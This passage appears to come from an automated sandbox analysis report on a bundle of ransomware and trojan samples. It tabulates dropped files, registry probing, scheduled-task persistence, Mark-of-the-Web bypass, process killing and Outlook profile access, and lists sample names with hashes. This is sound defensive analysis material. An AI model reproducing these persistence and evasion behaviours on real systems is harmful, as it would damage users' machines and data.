| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\LargeTile.scale-125.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-400_contrast-black.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\contrast-high\AboutBoxLogo.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\StoreLogo.scale-100.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-40_contrast-black.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ppd.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\24.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-100.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_COL.HXT | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\osclientcerts.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-125_contrast-black.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_RoomTracing_02.jpg | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-125.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-20_altform-unplated.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUIRES.DLL | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\WideTile.scale-200.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\174.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeTile.scale-100_contrast-white.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-lightunplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-40_altform-unplated_contrast-white.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\1850_24x24x32.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\offlineUtilities.js | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-100.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\dt_shmem.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019DemoR_BypassTrial180-ul-oob.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\de\UIAutomationTypes.resources.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\dictation\SpeechOn.wav | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SpotlightCalendar_2017-03.gif.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Dark.scale-125.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\w2k_lsa_auth.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\chromet.exe | C:\Windows\chromet.exe | N/A |
| File created | C:\Windows\chromet.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe | N/A |
| File opened for modification | C:\Windows\chromet.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe | N/A |
| File opened for modification | C:\Windows\assembly | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe:Zone.Identifier | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe:Zone.Identifier | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe | N/A |
| N/A | N/A | C:\ProgramData\DLL32.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
| N/A | N/A | C:\Windows\chromet.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00462.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00462.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe
C:\Users\Admin\AppData\Local\Temp\onefile_3144_133728903411204673\main.exe
HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exe
HEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe
HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exe
HEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe
HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exe
HEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
